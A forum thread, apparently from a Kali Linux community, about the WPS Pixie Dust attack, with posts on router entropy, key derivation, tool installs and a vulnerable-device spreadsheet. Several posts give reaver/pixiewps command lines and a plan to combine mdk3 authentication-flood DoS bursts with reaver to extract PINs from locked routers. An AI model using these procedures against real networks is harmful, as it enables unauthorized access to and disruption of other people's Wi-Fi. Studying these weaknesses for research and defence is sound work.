I found some interesting articles and documents highlighting flaws in /dev/random in embedded systems, thought I'd share with you. If you are not experienced, you probably won't understand much of it (thats me) but from what I understand, embedded systems from before July 2012 (or maybe even after) may be potentially vulnerable as they don't have a sufficient amount of entropy after being plugged in. The problem with newer devices (not sure about older devices) is that upon reboot, they save the entropy pool through a reboot/power loss. This is why forcing/DOSing an AP so it reboots is not effective in clearing entropy pools. I'm not sure if the same feature exists in pre-2012 devices so it may be something worth looking into. Heck, its even something Dominique noted in his presentations.

I guess one of the maintainers of /dev/random in Linux commented on his worries about the subject here: https://news.ycombinator.com/item?id=6548893

And the whole conference is available here: https://factorable.net/weakkeys12.conference.pdf

Whats even more intriguing about this is older hardware is more susceptible to DOS/force rebooting. The research paper explains how there were a lot of duplicate security keys used in various embedded systems, including "enterprise-grade routers from Cisco; server management cards from Dell, Hewlett-Packard, and IBM; virtual-private-network (VPN) devices; building security systems; network attached storage devices; and several kinds of consumer routers and VoIP products" (quoted from conference.pdf). This is what made them question the implementation. If there are a lot of duplicate keys, then there must not have been sufficient entropy feeding the PRNGs.

t6_x has ventured into the realm of Atheros devices and found that in hostapd, the WPS protocol is stopped before sending the M3 message if there is not sufficient entropy.

As you can see, there are many barriers to break, but much possibility for older devices, or maybe even newer devices if they don't include the patch released following the research. I mean, some manufacturers had zero security so anything is possible!

mmusket33
2015-07-29, 04:08
To soxrok2212

As we have noted to you in e-mails reference field experiments opening a WPS locked system - this DOS/forced rebooting does not seem to result in a total router reboot and the removal of the WPS locking mechanism. Rather it seems to affect the internal systems allowing for the collection of a small number of pins after the router is subjected to a short (15-20 sec) but intense DDOS process. Hence the WPS system always shows a locked state but small numbers of WPS pins can be collected after a DDOS and rest period. Usually approx 5 to 10 pins can be harvested every 360 seconds as a general rule.

Furthermore this short DDOS process sometimes results in the WPS pin resetting to 12345670. We have embedded this pin retest function into the VMR-MDK process which can considerably shorten the attack time required.


In field trials we have been getting good results from our lab variant VMR-MDK011x8 that we sent you which employs pixiedustwps1.1 and the automatic adding of any WPS pin found into the 4 stage attack process as well. However this is not a magic bullet and only a subset of routers are vulnerable to this approach.

MTeams

lllhamedlll
2015-07-29, 19:26
hi
i have some question
for offline cracking you need keywrapkey and authkey??? how u can find them???

thanks for help!

soxrok2212
2015-07-30, 22:12
hi
i have some question
for offline cracking you need keywrapkey and authkey??? how u can find them???

thanks for help!

You don't need the KeyWrapKey. It is used for making a bunch of other keys. The Authkey is printed in reaver, which is also included in Kali. Use -vvv for the verbosity mode.

lllhamedlll
2015-07-31, 06:51
You don't need the KeyWrapKey. It is used for making a bunch of other keys. The Authkey is printed in reaver, which is also included in Kali. Use -vvv for the verbosity mode.

thanks... and how we can derive authkey manually?? ... before starting attack:
we have KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)... DHkey= SHA-256(g^AB mod p)... and

AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

so we should know the value on the right side of equation ... so we have authkey.... right??

i want to study about attack in details...thanks...

soxrok2212
2015-07-31, 17:42
thanks... and how we can derive authkey manually?? ... before starting attack:
we have KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)... DHkey= SHA-256(g^AB mod p)... and

AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

so we should know the value on the right side of equation ... so we have authkey.... right??

i want to study about attack in details...thanks...

All the answers to your questions can be found here: http://cfile28.uf.tistory.com/attach/16132E3C50FCFFCB3EC74E

Look on page 37.

You can also watch Dominique's video: http://video.adm.ntnu.no/pres/549931214e18d and look at his slides: http://archive.hack.lu/2014/Hacklu2014_offline_bruteforce_attack_on_wps.pdf

They'll help you a lot :) Glad to see someone who, like me, wants to understand the attack rather than just do it :D

wiire
2015-07-31, 17:46
thanks... and how we can derive authkey manually?? ... before starting attack:
we have KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)... DHkey= SHA-256(g^AB mod p)... and

AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

so we should know the value on the right side of equation ... so we have authkey.... right??

i want to study about attack in details...thanks...

The WPS protocol uses the Diffie-Hellman key exchange which is a method of securely exchanging cryptographic keys over a public channel. The AP wants to talk to the Client but they don't want anyone else to be able to eavesdrop they conversation.

To accomplish this, they both generate a pair of keys (a public key and a private key):

- First the AP generates a (hopefully) random private key (A).
- Then it generates its public key, PKe = g^A mod p, where g and p are known and described by the WPS protocol, and sends it to the Client (with M1).

Now, it's the turn of the Client to generate its pair of keys:
- random private key (B)
- PKr = g^B mod p, and sends PKr to the AP (with M2).

At this point they both have each others public key and find the 'shared secret', a common key used to set up a secure channel.

To find the shared secret (g^(AB) mod p):
- the AP does: shared_secret = PKr^A mod p (which is equal to g^(AB) mod p)
- the Client does: shared_secret = PKe^B mod p (which is equal to g^(AB) mod p)

It may seems magic at first but it's simple math.

From this point on the WPS protocol imposes these steps:
- DHKey = SHA-256(shared_secret)
- KDK = HMAC-SHA-256{DHKey}(Enrollee nonce || Enrollee MAC || Registrar nonce), DHKey is used as key for the hash function
- AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

where || denotes concatenation (kdf ouputs a sequence of bytes, the first 256 are for AuthKey...).

AuthKey stands for Authentication session Key and it is, in fact, a session key.

Now if you are thinking at something like, "I sniff packets with Wireshark and then I generate AuthKey with the data collected". No, you can't. The Diffie-Hellman key exchange does not allow eavesdropping. It all starts with the pair of keys (public and private). To get to AuthKey you need the private key of one of the two involved entities (AP or Client). So Pixiewps needs AuthKey to work, which is provided by Reaver/Bully.

After M2 (before M3) they both have a secure channel to talk in.

However, Reaver >= 1.3 has a feature called "Small Diffie-Hellman keys" (-S, --dh-small). Enabling this feature causes Reaver to choose a static, not random private key, specifically the number 1.

So if we use this feauture with Reaver then the shared_secret becomes: g^(AB) mod p = PKe^B mod p = PKe mod p = PKe (g = 2, B = 1, p > 2).

PKe is calculated as g^A mod p, meaning that, PKe mod p = PKe (< p).

EDIT: of course you can calculate AuthKey everytime you know the private number (it doesn't have to be 1). With 1 it's just simplier.

lllhamedlll
2015-07-31, 19:44
All the answers to your questions can be found here: http://cfile28.uf.tistory.com/attach/16132E3C50FCFFCB3EC74E

Look on page 37....


The WPS protocol uses the Diffie-Hellman key exchange which is a method of securely exchanging cryptographic keys over a public channel. Alice wants to talk to Bob but they don't want anyone else to be able to eavesdrop they conversation....


thanks soxrok2212 !!!

i will study them... :)

and of course thanks to wiire !!!

i think it is not possible to explain better... :D

is this the last and best attack on WPS or not?

zen4
2015-08-08, 09:37
691
do this scripts suppose to work on nethunter ? sorry for bad capture, couldnt do it somehow else but you see the point is i can't use either mdk3 from kali or by team musket after make install mdk3-v6

soxrok2212
2015-08-21, 02:20
I don't know, my only pentesting platform is Kali on my laptop. You'd have to ask in the nethunter part of this forum.

adelmajid
2015-08-22, 07:35
thank you very much

therookie9
2015-08-24, 22:22
Hi

I run Reaver -i wlan0mon -c xx -b mac -K 1

on 3 of my router I have a dlink , netgear and Belkin it work complete only find password on the older Belkin router and others its say PIN NOT FOUND

am I doing something wrong or is this normal and this type of attack no longer works on newer router. is there anything better to try with

Thanks

Dab0y
2015-09-02, 02:33
anyone tried TP-Link devices?
I got some 740,841 and it's zip.

im many try with Tp-Link Device and Not Luck :confused:...
When im playing with wireshark and looking Tp-Link chipset much use Atheros :p

lllhamedlll
2015-09-02, 14:45
i can't find answer to my question anywhere... and can't message anyone in this forum... so I'm forced to ask here:
in PBC method.... enrollee doesn't know any secret value...just press button and finish!.... so how is it possible to send M3 message or M5 or m7 message ?....it seems in this method sending this values is not necessary !

aanarchyy
2015-09-02, 17:37
From what I've seen, even a Push Button Event is still a normal Wps transaction. It still runs through the whole M1 through M8, it will just accept I think any pin you throw at it. I tested that a while ago. PBE, then with reaver I tried pin 00000000 and it went through successfully as a full Wps transaction and retrieved the psk.

meltdown
2015-09-02, 20:41
Hi

I run Reaver -i wlan0mon -c xx -b mac -K 1

on 3 of my router I have a dlink , netgear and Belkin it work complete only find password on the older Belkin router and others its say PIN NOT FOUND

am I doing something wrong or is this normal and this type of attack no longer works on newer router. is there anything better to try with

Thanks

This means your router is invulnerable to Pixie Dust Attack

blackdream
2015-09-18, 07:01
Hi soxrok2212 !!!

Thanks for WPS Pixie Dust Database.xls file. In cloumn F (Vulnerable?) = No . Does it means the specified chip wont Vulnerable with ( -f option) also ? or just with -K option of reaver.?

soxrok2212
2015-09-18, 19:21
Hi soxrok2212 !!!

Thanks for WPS Pixie Dust Database.xls file. In cloumn F (Vulnerable?) = No . Does it means the specified chip wont Vulnerable with ( -f option) also ? or just with -K option of reaver.?

I think you are a bit confused here, -f is ONLY for Realtek devices when E-S1 and E-S2 are not generated within the same second, or within a few seconds of the Nonce. All -f does is it runs all the possible seeds through the PRNG (seeds in this specific case are time in seconds since Epoch). -f is NOT a solution to any router, ONLY Realtek when E-S1 and E-S2 are not generated the same second, or within a few seconds of the Nonce. In the database, "No" means that the specified AP is NOT currently vulnerable to the Pixie Dust attack.

blackdream
2015-09-20, 05:36
Thank you soxrok2212 !!

Quest
2015-10-12, 18:41
Just re-installed KL1.1.0a, and when trying to apt-get install, libssl-dev, libpcap-dev and libsqlite3-dev I get this..


root@kali:~# apt-get install libssl-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@kali:~# apt-get install libpcap-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package libpcap-dev
root@kali:~# apt-get install libsqlite3-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package libsqlite3-dev
root@kali:~#


Any ideas?

Laserman75
2015-10-12, 19:45
sudo gedit /etc/apt/sources.list



Code:

#

# deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free

#deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free

deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free

deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

deb http://http.kali.org/kali sana main non-free contrib

deb http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free

deb http://repository.spotify.com stable non-free



and

sudo apt-get install linux-headers-$(uname -r)

Quest
2015-10-12, 19:50
thanks Laserman75, was afraid that "sudo apt-get install linux-headers-$(uname -r)" would brake my installation since it's not the latest Kali. Same for those "sana" repos I presume? It will all work with KL1.1.0a ??

Edit: I do not want to upgrade to KL2. That is the whole point of reinstalling 1.1.0

Edit2: anyways I've installed manually and everything works beautifully..

https://packages.debian.org/wheezy/libsqlite3-dev and searched for each reaver/pixie dependency 'wheezy' package and downloaded them. Then istalled in that order..

dpkg -i libc6-dev_2.13-38+deb7u8_amd64.deb
dpkg -i libpcap0.8-dev_1.3.0-1_amd64.deb
dpkg -i libpcap-dev_1.3.0-1_all.deb
dpkg -i libsqlite3-0_3.7.13-1+deb7u2_amd64.deb
dpkg -i libsqlite3-dev_3.7.13-1+deb7u2_amd64.deb
dpkg -i libssl1.0.0_1.0.1e-2+deb7u17_amd64.deb
dpkg -i libssl-dev_1.0.1e-2+deb7u17_amd64.deb

Nice to see mon0 again :)

soxrok2212
2015-10-12, 22:09
thanks Laserman75, was afraid that "sudo apt-get install linux-headers-$(uname -r)" would brake my installation since it's not the latest Kali. Same for those "sana" repos I presume? It will all work with KL1.1.0a ??

Edit: I do not want to upgrade to KL2. That is the whole point of reinstalling 1.1.0

Edit2: anyways I've installed manually and everything works beautifully..

https://packages.debian.org/wheezy/libsqlite3-dev and searched for each reaver/pixie dependency 'wheezy' package and downloaded them. Then istalled in that order..

dpkg -i libc6-dev_2.13-38+deb7u8_amd64.deb
dpkg -i libpcap0.8-dev_1.3.0-1_amd64.deb
dpkg -i libpcap-dev_1.3.0-1_all.deb
dpkg -i libsqlite3-0_3.7.13-1+deb7u2_amd64.deb
dpkg -i libsqlite3-dev_3.7.13-1+deb7u2_amd64.deb
dpkg -i libssl1.0.0_1.0.1e-2+deb7u17_amd64.deb
dpkg -i libssl-dev_1.0.1e-2+deb7u17_amd64.deb

Nice to see mon0 again :)

So are you all set then?

Quest
2015-10-12, 22:28
yup set and happy to see 1.1.0

soxrok2212
2015-10-12, 22:41
yup set and happy to see 1.1.0

Awesome, I am also considering building a new rig, if i can find the money... wondering if I should go with 1.1.0 or 2.0...

Quest
2015-10-12, 22:58
strange situation we are in. The good news is; one does not prevent the other. As a main OS though... good luck with that. What were they thinking upstream worry's me abit more... Wish I'd be abit more constructive, but really I'm lost (more than usual).

soxrok2212
2015-11-21, 22:48
I'd just like to leave a comment here, as of today, November 21, 2015, 56/96 devices reported have been confirmed vulnerable. That's 58.3%! While I assure you this is not real-world accurate as people probably don't report as many failed tests as successful test, these are still some pretty high numbers! If you manage to find more, both vulnerable and not vulnerable, please report here! Thanks! https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit#gid=2048815923

soxrok2212
2015-12-19, 05:45
Don't get discouraged, this is nothing new, and probably won't turn out to be anything sufficient but you miss 100% of the shots you don't take so I might as well try.

Tonight I was doing some research on the LRNG (Linux Random Number Generator) and I came across this interesting document http://eprint.iacr.org/2006/086.pdf

It highlights how the LRNG works in various systems, embedded systems, and directly (but briefly) targets OpenWRT. Mind you I don't have a degree in Computer Science, nor Computer Security bla bla bla, but according to this document, the ONLY source of entropy in kernel 2.6.10 (yes it is pretty old) is from network traffic. Apparently in this version, entropy was not carried across reboots, though I believe most current networking devices that run Linux do save it now, but let's not jump to conclusions yet. I haven't finished reading the whole document as it is very late but I figured I'd share to see what you maybe more, maybe less advanced people think.

Even if this practically exists across a small fraction of routers still in use today, it certainly seems to be something worth looking into. Let me know what you think!

Quest
2015-12-21, 02:48
not often I've witnessed a concept based upon vague and obscure notions actually materialize into workable software.

When I first posted I was both interested and skeptical. The skeptical part was proven wrong and quickly dissipated as it unbelievably, happened. This thread is where the actual, workable, revolutionary and delicious program was born, only because soxrok2212 understood then the potential and the mechanics of the Pixie attack well enough to gather the energies here to make it happen for us all. So many thanks guys! To Dominique Bongard for the original R&D, wiire for the actual software that we, common mortal use, DataHead, t6_x, aanarchyy, FrostyHacks, and soxrok2212 for the leadership, but most importantly, your Jedi skills.

Cheers!!

soxrok2212
2015-12-27, 00:57
Wasn't just me, primarily Datahead. He was my inspiration, he had all the concepts understood before I did (way before I did, in fact) and he really deserves the trophy on this one. Had it not been for him, I think I would've given up. No I am not just saying this to be nice, it was really Datahead all along, look at me as just the "messenger". Bongard provided the materials, Datahead provided the major concepts I was missing, FrostyHacks also helped me with some pieces I didn't have a grip on, aanarchyy is a bro and kept me inspired all along and provided some critical testing devices, and wiire made it all happen (publicly). But really, hats off to Datahead :)

soxrok2212
2015-12-31, 05:27
More speculation about attacking the Linux Random Number Generator... probably just me rambling because it's late, but why not post? Anyways, my understanding on this post comes from here: http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Gutterman.pdf

Now, not being an avid user of OpenWRT, I can't say how much of the research and discovery in this document is still true, but it can't hurt to try. Gutterman, the author of this document claims that both /dev/random and /dev/urandom draw from the same entropy pool. What is the difference between, /dev/random and /dev/urandom? Well, when entropy is low in the entropy pool, /dev/random blocks output until there is sufficient entropy while /dev/urandom will always output data (this is true of all devices using the Linux RNG). Now, if I tell you that Hostapd's WPS implementation uses /dev/random, what do you think? Ponder this a minute before reading the next sentence, see if your gears start ticking!

If we attack an arbitrary protocol that uses /dev/urandom, we can effectively drain the entropy pool without running the WPS protocol and risking lockouts/timeouts/etc. Before anything though, there are a few things that we have to consider, so don't get too excited (most of this is probably just me rambling).

-The WPA/WPA2 protocol: nonces are generated, and it wouldn't seem reasonable to use /dev/random because a device would not be able to join a network assuming a router was just installed, no entropy has been generated and a device wants to join. Could we attack this protocol to drain the entropy pool? Guess we'll have to find out!

-When will the LRNG/WPS protocol stop blocking? How much entropy is required to be able to use the entropy?

-What are sources of entropy in an embedded system such as a wireless router? LAN traffic? WAN traffic? Would WAN traffic make sense in a non-internet connected setup? What if temporary networks are set up and never have internet access? (Lan parties?) There are no hard drives, mice, keyboards or other peripherals in these types of embedded systems (yes a large amount of routers have USB ports, but it can't be assumed that all consumers actually use them).

-Do entropy pools save across reboots? While I don't know of a stone cold answer, t6_x leads me to believe in recent versions of Linux they do.

Update about an hour later: I just remembered that Bongard actually noted something on his slide presentation, low entropy across boot, making note of common states after reboot, though it's something he didn't really touch on. Maybe I'm actually onto something...

mmusket33
2015-12-31, 11:20
Ref dev/random and dev/urandom

Maybe you are answering a question MTeams has had for a long time. First we are seeing alot of WPS pin cracks at 12345670 or the default first pin. We have hacked thru the router userame and password and found the pin to be set to another pin

Maybe if dev/random does not have enough random data(you call it entropy) to produce a random number then the firmware just defaults the pin to 12345670 or in the case of dev/urandom the randomness due to lack sufficient data results in a default pin being produced. Hence heavy DDOS the router with processes like mdk3 a -Authentication Dos mode, may in some cases overload the firmware and the dev/random processes themselves fail. Hence it is not necessary to actually reset the router - just deplete it of the of the time to produce complete random numbers and certain operation can again be conducted.

You may have also answered the question as to why the VMR-MDK series works as when you flood the router with short bursts of mdk3 a WPS router sometimes gives up more pins even when locked.

We should look at tying up the router processes rather attempting a reset.

MTeams

soxrok2212
2016-01-02, 20:41
Ref dev/random and dev/urandom

Maybe you are answering a question MTeams has had for a long time. First we are seeing alot of WPS pin cracks at 12345670 or the default first pin. We have hacked thru the router userame and password and found the pin to be set to another pin

Maybe if dev/random does not have enough random data(you call it entropy) to produce a random number then the firmware just defaults the pin to 12345670 or in the case of dev/urandom the randomness due to lack sufficient data results in a default pin being produced. Hence heavy DDOS the router with processes like mdk3 a -Authentication Dos mode, may in some cases overload the firmware and the dev/random processes themselves fail. Hence it is not necessary to actually reset the router - just deplete it of the of the time to produce complete random numbers and certain operation can again be conducted.

You may have also answered the question as to why the VMR-MDK series works as when you flood the router with short bursts of mdk3 a WPS router sometimes gives up more pins even when locked.

We should look at tying up the router processes rather attempting a reset.

MTeams

Not sure about this theory but it sure is interesting. Entropy doesn't affect the pin, it affects the secure keys used to protect the pin. Are you able to send me a pixielog of an instance where pin 12345670 is used instead of the sticker pin?

mmusket33
2016-01-03, 11:59
To soxrok2212

We will begin checking all the router firmware setting for those routers we can access. We have been seeing the pin reset on occasion. Sometime during a reaver attack the router resets the pin to 12345670. As reaver checks this pin at the beginning of the attack, reaver then climbs to 99% and spins endlessly as it cannot find the pin. In such a case we would either add --pin=12345670 to the command line or simply restart a new reaver attack from start. Reaver would then crack the WPA code when it checked 12345670. It happened enough for use to write a retest pin 12345670 feature in VMR-MDK.

If you remember we previously mentioned to you that if you run mdk3 type alpha (ie type a DDOS) using the same wifi device ie mon0 or wlan0mon as used with reaver, reaver can extract pins thru the mdk3 fog. If you use a different device to run mdk3, then reaver cannot access the router.

In response to your publication of papers dealing with depleting dev/random processes we stopped all other projects and immediately began running tests with simultaneous reaver/mdk3 attacks against WPS locked routers and/or routers which did not respond to reaver even when they were open.

Even after 24 hours of tests we are seeing interesting results.

1. Some WPS locked routers gave up some pins

2. Open WPS enabled router which do not respond at all to reaver begin responding.

3. DDOS during a reaver attack seems to cause some routers to jump channels when just DDOS them alone did not cause channel switching. And such channel switching always resulted in more WPS pins collected in cases where the router was locked

We have only tested this on a few targets.

We suggest running reaver for say 180 seconds and mdk3 type alpha DDOS at the same time for 30 seconds. Thirty seconds after the reaver/mdk3 start, mdk3 terminates and reaver continues for 150 seconds and then restarts

As some WPS locked routers have been giving up pins slowly. We are trying to find a way to keep the pin collection going. We will write these routines into varmacscan??.sh which will automate the process and give us a wider target base for check and we will begin recoding VMR-MDK to allow a short mdk3 process at the start of the reaver attack

As a basic command line example

timeout 180 reaver -i mon0 -b 55:44:33:22:11:00 -vvv

timeout 30 mdk3 mon0 a -a 55:44:33:22:11:00

shutdown processes

spoof macs

restart

These processes need to be automated

MTeams

sandyuk
2016-01-03, 14:38
Congrats and well done on the great work. I know some of you guys have put in a great efforts for pixie and other projects. I have been a kali user for a few years now and a reader of the forums so hope you dont mind me asking a question.

I have successfully used the reaver on some listed vulnerable hardware giving me the E-Nonce, PKE, R-Nonce. PKR, AuthKey, E-Hash1, E-Hash2 then running pixie to give me the WPS PIN then the WPA KEY.

However there is one hardware ap that I reaver that gives me the E-Nonce, PKE, R-Nonce. PKR, AuthKey, E-Hash1, E-Hash2 but tells me WPS PIN not found. Im I correct in thinking that the fact that I get the E-Nonce, PKE, R-Nonce. PKR, AuthKey, E-Hash1, E-Hash2 that I have everything I need and the WPS PIN is to be found? Or is in not as simple as that?

I say this because some hardware you get nothing from no E-Nonce, PKE, R-Nonce. PKR nothing at all. But this hardware is feeding back something but reaver cant figure out the alithogram or whatever to get the WPS PIN.

I take it this hardware isn't vulnerable? and what it is spiting out is on no use at all?

Thanks in advance.

soxrok2212
2016-01-03, 15:36
The attack is based on the fact that some chipset vendors generate weak security keys to "encrypt" the pin. I don't even think encryption is the right word because it was a very pathetic attempt. Basically, some chipset manufacturers either made the encryption keys 0, or the made them predictable, they could be found from the nonce that was given to use plaintext. In your case, you are probably trying on an invulnerable chipset manufacturer that uses a secure method of generating keys.

soxrok2212
2016-01-05, 19:03
Also, for those of you having trouble with Reaver, try Bully! https://github.com/aanarchyy/bully
AAnarchYY recently modded it to support the pixie dust attack! Much faster and will compile on many more devices natively.

Quest
2016-01-05, 20:17
hey soxrok, will the new Bully and t6_x Reaver, have to be updated for the new Pixie 1.2.2 ? Or are they completely independent??

soxrok2212
2016-01-05, 23:52
They should work fine :)

aanarchyy
2016-01-06, 00:55
Bully works just fine ;-)

Quest
2016-01-06, 02:16
well... I knew the answer to that, AH! Was just checking if you guys were paying attention and what's your response time was. 2:15 is kinda slow.

*hides under the desk, pretend that I'm off line*

soxrok2212
2016-01-06, 02:33
Maybe someone here knows the answer to this, somewhere on the internets I came across a guy that claimed he found 2 vulnerable Broadcom devices.. anyone know what I'm talking about and have a link?

Kaushalrocks
2016-01-06, 17:22
How to install this new bully pixiewps on kali 2.0 ?
Plz send coding to install same and also how to use?
Is there any benefit over reaver or more vulnerabilty to other routers??
Please reply asap.

Laserman75
2016-01-06, 20:34
How to install this new bully pixiewps on kali 2.0 ?
Plz send coding to install same and also how to use?
Is there any benefit over reaver or more vulnerabilty to other routers??
Please reply asap.

wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
cd '/root/bully-master/src'
make
sudo make install

slmafiq
2016-01-07, 15:38
why BULLY cant be installed?

*youtube*

soxrok2212
2016-01-07, 15:43
why BULLY cant be installed?

*removed*



apt-get install libpcap-dev


Edit: @Quest was that quick enough for you?

Quest
2016-01-07, 16:55
5 mins... Not bad not bad.

**** ;)

kcdtv
2016-01-07, 17:14
Is there any benefit over reaver
Without any doubt If you use a Ralink USB (RT3070, RT3072, RT3570, RT3572 ) as they works very bad with reaver
For the rest of chipset it is more or less the same, try and you wil see which you like more.

or more vulnerabilty to other routers??
Both uses pixiewps and will exploit exactly the sames vulnerabilities

slmafiq
2016-01-08, 10:49
soxrok2212 tnx for reply
but this is the result
ERROR
I use kali 2.

apt-get install libpcap-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
libpcap0.8-dev......

.................................................. ...........
Cd bully/src
Make
compilation terminated.
Makefile:19: recipe for target 'bully' failed
make: *** [bully] Error 1

Quest
2016-01-08, 11:20
download again > decompress in /root so you have a bully-master folder. Then


cd /root/bully-master/src
make
make install

slmafiq
2016-01-08, 13:29
download again > decompress in /root so you have a bully-master folder. Then


cd /root/bully-master/src
make
make install

I made it this way
wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
cd '/root/bully-master/src'
make
sudo make install
But have error

zimmaro
2016-01-08, 14:14
I made it this way
wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
cd '/root/bully-master/src'
make
sudo make install
But have error

what "type of error"??
post here!!
if this is "RELATED to dependancies" try first:

apt-get -y install build-essential libpcap-dev libssl-dev aircrack-ng pixiewps

after

cd '/root/bully-master/src'
make
sudo make install

slmafiq
2016-01-08, 15:51
Thanks zimmaro!
I installed bully successfully!

apt-get update
apt-get -y install build-essential
apt-get install libpcap-dev
apt-get install libssl-dev

kcdtv
2016-01-17, 19:07
Crazy thing...
I am testing a ZTE device (ZTE H218N) that is used byt the ISP jazztel (spain)
The device had PIN 12345670 enabled by default. A cople of years ago jaztel made un update to "disable" WPS
My guess is that they "unconfigured" the PIN or voluntary broke the protocol at some pòint.
The routers appears in wash....
Majority of time i get a continuous fail with our tools...
http://pix.toile-libre.org/upload/original/1453056425.png
But at some point... i get an M1, send an M2 receive an m3 and pixiewps is launched
Look at that :

http://pix.toile-libre.org/upload/original/1453056931.png
Incredible....
The PKE is exactly the same than for the realteck devices that are suported by pixiewps
and
E-HASH 1 = E-HASH2

The fact to see again this PKE is pure madness
This PKE repeated all the time was the starting point of the disovery of the breach for realteck....
And we see it again on broadcom chipset ...

And what about this unconceivable same value for Ehash1 and Ehash2?
It would mean that ES1 = ES2 and PSK1=PSK2....
ES1 and ES2 are not equal to 0 like for the ralink otherwise i would have get the results.
PSK1=PSK2 would be only possible if the PIN is 00000000
I tried to launch with 0000000 and didn't get nothing.

It is also strange to be able to send an m2 sometimes and that maybe something to dig for other purposes (check https://forums.kali.org/showthread.php?25459-Force-an-AP-to-reboot&highlight=reboot+ap)

This unsupported broadcom device with PIN mode broken has a very strange behavior....

the chipset is according to the wiki devi :

SoC Ram Flash Network USB Serial JTag
Broadcom BCM5357 64MiB 16MiB 5 GbE Yes 2x v2.0 ? ?

soxrok2212
2016-01-17, 21:04
If you supply PIN 12345670 does it still recover the PSK? I think we briefly discussed this a LOOOOOONG time ago in a chat... The only reason I can think of off the top of my head is that the PIN is not configured and the router is just sending random data... but then again the static PKe is too... provoking to ignore. Do you have any more ZTE H218N's you can test this on?

UPDATE: I wonder if the network is using another device to as the enrollee. Perhaps something like this is going on? Or try deauthing all the clients and see if you get the same result.

wiire
2016-01-17, 22:59
The new pixiewps when modes are not specified uses the Pke to try to determine the target. This means it's trying only for Realtek. You should trying manually specifying all the modes --mode 1,2,3,4,5.

Also in case of Ralink devices with push button active, the 2 hashes are identical because of pin and secret hashes equal to 0.

In the beacon frame there could be the chipset vendor. It's under 'Tag vendor specific'.

UPDATE: seems aanarchyy 's Bully doesn't run with --force. The nonce generated seems to be compatible with a Realtek device. I recommend again to test it manually and check in the beacon frame if the vendor information is present.

kcdtv
2016-01-18, 21:57
Hi soxrok2212, Hi wiire :D

first of all it seems that the "wikidevi" is wrong or they may be several version of the device... The point is that the chipset appears to be a realteck one instead of a BCM:
http://pix.toile-libre.org/upload/original/1453147002.png
thanks for the trick wiire : i always looked in the WPS tags and didn't noticed that information could be gathered there.
That would explain the presence of our "provocative PKE" in the M' messages.
It doesn't explain why pixiewps didn't launched a long bruteforce (i tried with --force or mode 3 --force / and i tryed every mode separatly)
This case is definitely less weird/interesting than what i thought first as i thought it was a broadcom device.
i managed to repeat once this "fake" pixie dust and i got the realtek PKE (as expected) and two identical ehash again. (like the first time, not the same ehash than the first time but the same ehash1 and ehash2 )
i get a strange error if i put the stdout here (with our without code-quote)... If somebody wants it ask me by PM and i will PM it to you. (or you can get it form here : https://www.wifi-libre.com/topic-335-extrano-ataque-pixeidust-contra-zte-h218n-sin-wps-habilitado.html#p1776)

If you supply PIN 12345670 does it still recover the PSK?
Never ever since the firmware update (around 2014)
Just from time to time you would get enough for a pixiedust... nothing else (never get a M5 or more)

discussed this a LOOOOOONG time ago in a chat... The only reason I can think of off the top of my head is that the PIN is not configured and the router is just sending random data
Yes indeed.
By seeing this realteck PKE in what was supposed to be braadcom router i got emotionalized and thought that this datas may lead to something to discover another weakness in some unsupported broadcom.
But this ZTE router definitely have a realteck chipset...
Thanks for your "lights" about this.

wiire
2016-01-18, 23:07
That's what I suspected. It's Realtek without a doubt.

What do you mean pixiewps didn't launched the full bruteforce? I'm pretty confident it found the seed but couldn't recover the pin if it stopped right away.

Try compiling with 'make debug' and see if at some point it says 'Seed found' or something similar.

The two hashes should be identical only in case of the PBC pin as you pointed out (in case es1 and es2 are the same as well).

When testing the program I did test it against PBC so I'm sure it works properly.

kcdtv
2016-01-19, 14:32
that's what i get in stdout with adding --force -v 3


Pixiewps 1.2

[-] WPS pin not found!

Time taken: 1 s 908 ms


pixiewps seems to work properly as it is suggested to use "force" when i don't use it :

Pixiewps 1.2

[-] WPS pin not found!

Time taken: 1 s 903 ms

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

It doesn't explicitly stdout that seed is found so i am gonna install in debug mode...
see you in 5 minutes...

... You are absolutely right
I didn't doubt it but I just wanted to see the debug mode in action... :D And I will leave it in debug mode, i prefer like this :D
- edit : well , I won't because that would break the compatibility in automatized pixie dust mode with reaver 1.5.2 or bully revisited by aanarchyy. I precise this in case people would compile in debug mode

http://pix.toile-libre.org/upload/original/1453213519.png

It is not as interisting as i thought first but it still useful to know : As every manufascturer do what they want with PROBES and there is not a way to distinguish beetwen routers with WPS PIN correctly enabled and the others... well, this seems to be the way!
If our ehash-1 and ehash2 are equals in our M3 message it means that only PBC is fully enabled and that PIN mode will not lead to anything.
